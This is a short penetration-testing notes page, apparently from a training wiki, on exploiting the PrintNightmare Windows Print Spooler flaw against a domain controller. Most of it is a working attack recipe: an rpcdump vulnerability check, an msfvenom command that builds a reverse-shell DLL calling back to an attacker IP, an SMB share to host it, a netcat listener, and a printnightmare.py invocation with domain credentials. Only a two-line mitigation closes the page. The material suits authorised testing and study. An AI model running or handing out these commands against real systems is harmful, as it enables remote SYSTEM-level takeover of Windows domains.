PrintNightmare

Overview

The PrintNightmare vulnerability has to do with a flaw found in the Windows Print Spooler service. The flaw being that the service allows users to add printers and devices AND runs as system.

This is a Post-Compromised attack and only needs a regular user account

PrintNightmare Attack

Check if the Domain Controller is vulnerable

rpcdump.py @192.168.1.129 | egrep 'MS-RPRN|MS-PAR'

Desired Output

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Generate malicious DLL, host it and start listener

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=1337 -f dll > shell.dll
smbserver.py share `pwd` -smb2support
nc -lnvp 1337

Download and run this script.

python3 printnightmare.py pnpt.local/greg:[email protected] '\\192.168.1.11\share\shell.dll'

CVE-2021-34527/nightmare-dll/nightmare at master · JohnHammond/CVE-2021-34527GitHub

Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"

Mitigation

Run Stop-Service Spooler
- REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f

PreviousZerologon NextC2

hashtagOverview

hashtagPrintNightmare Attack

hashtagCheck if the Domain Controller is vulnerable

hashtagDesired Output

hashtagGenerate malicious DLL, host it and start listener

hashtagMitigation